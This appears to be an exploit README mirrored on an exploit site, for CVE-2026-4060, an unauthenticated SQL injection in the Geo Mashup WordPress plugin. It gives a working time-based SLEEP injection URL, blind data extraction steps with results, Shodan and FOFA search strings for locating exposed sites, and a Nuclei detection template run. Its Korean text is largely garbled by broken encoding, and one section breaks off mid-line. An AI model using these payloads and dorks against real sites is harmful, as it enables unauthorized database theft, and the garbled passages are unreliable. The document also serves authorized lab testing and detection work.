Share
## https://sploitus.com/exploit?id=EBC57F95-FCBC-5E72-B5F4-3C5722E51463
# CVE-2026-4060 β Geo Mashup β€ 1.13.18 Unauthenticated SQL Injection PoC


-blue)

> **Unauthenticated** attackers can inject arbitrary SQL into the `ORDER BY` clause via the `sort` parameter of the Geo Mashup `render-map` endpoint, enabling time-based blind extraction of sensitive database information.
---
## Table of Contents
- [Vulnerability Overview](#vulnerability-overview)
- [ν
μ€νΈ νκ²½](#ν
μ€νΈ-νκ²½-test-environment)
- [ν
μ€νΈ μ€ν λ°©λ²](#ν
μ€νΈ-μ€ν-λ°©λ²-how-to-run)
- [ν
μ€νΈ κ²°κ³Ό](#ν
μ€νΈ-κ²°κ³Ό-test-results)
- [Mitigation](#mitigation)
- [Detection](#detection)
- [Timeline](#timeline)
- [References](#references)
---
## Vulnerability Overview
| Field | Detail |
|-------|--------|
| **CVE** | CVE-2026-4060 |
| **Plugin** | [Geo Mashup](https://wordpress.org/plugins/geo-mashup/) by cyberhobo |
| **Affected** | β€ 1.13.18 |
| **Fixed in** | 1.13.19 |
| **CVSS v3.1** | 7.5 (High) β `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` |
| **CWE** | [CWE-89](https://cwe.mitre.org/data/definitions/89.html) β Improper Neutralization of Special Elements in SQL |
| **Auth required** | None (Unauthenticated) |
### Technical Detail
The `sort` parameter accepted by the `render-map` endpoint is passed directly into a `$wpdb->get_results()` call without sanitization:
```php
// render-map.php (simplified)
$sort = $_GET['sort'];
$results = $wpdb->get_results(
"SELECT ... FROM wp_geo_mashup_locations ... ORDER BY $sort"
);
```
Because `$sort` is interpolated as-is, an attacker can inject a subquery into the `ORDER BY` clause. WordPress's `wpdb` escapes single quotes, so the PoC uses `ORD(SUBSTRING(...))` with numeric comparisons to bypass this restriction and perform time-based blind extraction.
**Vulnerable endpoint:**
```
GET /?geo_mashup_content=render-map&map_content=global&sort=
```
---
## ν
μ€νΈ νκ²½ (Test Environment)
| Component | Version |
|-----------|---------|
| OS | macOS (Darwin 25.4.0) |
| Docker | 27.x |
| WordPress | 6.8.2 (PHP 8.2, Apache) |
| MariaDB | 11.4 |
| Geo Mashup | **1.13.18** (vulnerable) |
| Python | 3.x (for `poc.py`) |
| Nuclei | v3.8.0 |
### Lab Architecture
```
βββββββββββββββββββββββββββββββββββ
β Host (localhost:8080) β
β β
β βββββββββββββββ ββββββββββββ β
β β WordPress β β MariaDB β β
β β 6.8.2+PHP82 ββββ 11.4 β β
β β :80 β β :3306 β β
β βββββββββββββββ ββββββββββββ β
β + Geo Mashup 1.13.18 β
βββββββββββββββββββββββββββββββββββ
```
Geo Mashup 1.13.18 μ€μΉ νμΈ:

---
## ν
μ€νΈ μ€ν λ°©λ² (How to Run)
### 1. μ·¨μ½ νκ²½ ꡬμ±
```bash
git clone https://github.com/ydking0911/CVE-2026-4060-PoC.git
cd CVE-2026-4060-PoC
bash setup.sh
```
`setup.sh`κ° μννλ μμ
:
- WordPress 6.8.2 + MariaDB 11.4 컨ν
μ΄λ μ€ν
- Geo Mashup **1.13.18** (μ·¨μ½ λ²μ ) μλ μ€μΉ λ° νμ±ν
- μ§λ μλν¬μΈνΈκ° μ μ μλ΅νλλ‘ geo-tagged ν¬μ€νΈ μμ±
μλ£ ν μ μ:
- **Site:** `http://localhost:8080`
- **Admin:** `http://localhost:8080/wp-admin` (ID: `admin` / PW: `admin`)
### 2. μ·¨μ½μ νμΈ (SLEEP Injection)
```bash
time curl -s -o /dev/null \
"http://localhost:8080/?geo_mashup_content=render-map&map_content=global&sort=%28SELECT%280%29FROM%28SELECT%28SLEEP%288%29%29%29a%29"
```
μλ΅μ΄ ~8μ΄ μ§μ°λλ©΄ `ORDER BY` μ SQL Injection νμΈ.
### 3. λ°μ΄ν° μΆμΆ (PoC)
```bash
# κΈ°λ³Έ μ€ν (κ²°κ³Όλ§ μΆλ ₯)
python3 poc.py --url http://localhost:8080
# verbose λͺ¨λ (payload β μλ΅ μκ° β μΆμΆ λ¬Έμ κ³Όμ μΆλ ₯)
python3 poc.py --url http://localhost:8080 --verbose
# SQLi μ‘΄μ¬ μ¬λΆλ§ λΉ λ₯΄κ² νμΈ
python3 poc.py --url http://localhost:8080 --confirm-only
```
### 4. Nuclei νμ§ ν
νλ¦Ώ μ€ν
```bash
nuclei -t nuclei/CVE-2026-4060.yaml -u http://localhost:8080
```
### 5. νκ²½ μ’
λ£
```bash
docker compose down -v
```
---
## ν
μ€νΈ κ²°κ³Ό (Test Results)
### True Positive (TP) β μ·¨μ½ν λμ
#### TP-1: ORDER BY SLEEP(8) μ£Όμ
μ±κ³΅
`sort` νλΌλ―Έν°μ `SLEEP(8)` μλΈμΏΌλ¦¬λ₯Ό μ£Όμ
νμ¬ μλ΅μ΄ 8μ΄ μ§μ°λ¨μ νμΈ.
```bash
time curl -s -o /dev/null \
"http://localhost:8080/?...&sort=%28SELECT%280%29FROM%28SELECT%28SLEEP%288%29%29%29a%29"
```

#### TP-2: λ°μ΄ν° μΆμΆ (verbose λͺ¨λ)
`ORD(SUBSTRING(...))` κΈ°λ°μΌλ‘ ν κΈμμ© DB μ 보λ₯Ό μΆμΆνλ μ κ³Όμ .
payload μ μ‘ β μλ΅ μκ° μΈ‘μ β SLEEP λ°μ μ ν΄λΉ λ¬Έμ νμ .
```bash
python3 poc.py --url http://localhost:8080 --verbose
```

**μΆμΆλ μ 보:**
| Query | Result |
|-------|--------|
| `VERSION()` | `11.4.10-MariaDB` |
| `DATABASE()` | `wordpress` |
| `USER()` | `wordpress@172.23.0.3` |
#### TP-3: Nuclei ν
νλ¦Ώ νμ§
```
[CVE-2026-4060] [http] [high]
http://localhost:8080/?geo_mashup_content=render-map&map_content=global&sort=%28SELECT%280%29FROM%28SELECT%28SLEEP%288%29%29%29a%29
Scan completed in 8.07s. 1 matches found.
```
---
### False Positive (FP) β λΉμ·¨μ½ λμ
Nuclei ν
νλ¦Ώμ λ λ¨κ³ flowλ‘ FPλ₯Ό λ°©μ§ν©λλ€.
#### FP-1: Geo Mashup λ―Έμ€μΉ
Step 1μμ `readme.txt` κ° 404λ₯Ό λ°ννλ©΄ μ¦μ μ’
λ£. SQL payloadλ μ μ‘λμ§ μμ.
```
Scan completed in 62ms. 0 matches found. β
```
#### FP-2: ν¨μΉλ λ²μ (β₯ 1.13.19)
`readme.txt` λ²μ νμΈ:

`compare_versions(version, '= 8s
```
**Shodan / FOFA:**
```
Shodan: http.html:"geo-mashup"
FOFA: body="geo-mashup"
```
---
## Timeline
| Date | Event |
|------|-------|
| 2026-04 | μ·¨μ½μ λ°κ²¬ |
| 2026-04 | νλ¬κ·ΈμΈ κ°λ°μ λ³΄κ³ |
| 2026-05 | Geo Mashup 1.13.19 ν¨μΉ λ¦΄λ¦¬μ¦ |
| 2026-05-14 | CVE ν λΉ λ° κ³΅κ° |
---
## References
- [NVD β CVE-2026-4060](https://nvd.nist.gov/vuln/detail/CVE-2026-4060)
- [Wordfence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/id/2fa5ae9a-532c-40f9-b70a-217f0f9cd473?source=cve)
- [Plugin Changeset (fix)](https://plugins.trac.wordpress.org/changeset/3503627/)
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
---
## Disclaimer
This repository is for **educational and authorized security testing purposes only**.
Do not use against systems you do not own or have explicit written permission to test.
The author is not responsible for any misuse of this material.